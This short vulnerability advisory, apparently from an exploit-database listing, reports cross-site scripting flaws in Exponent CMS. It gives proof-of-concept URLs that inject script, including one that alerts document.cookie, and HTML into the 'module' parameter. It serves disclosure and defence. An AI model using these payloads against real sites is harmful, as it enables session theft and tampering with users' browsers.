Exponent CMS Multiple Cross-Site Scripting Vulnerabilities

Exponent CMS Multiple Cross-Site Scripting Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/endon/mod.php?action=[BLABLA]&module=[XSS]
http://www.example.com/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/expo/index.php?action=view&id=2&module=<h1>Tes</h1>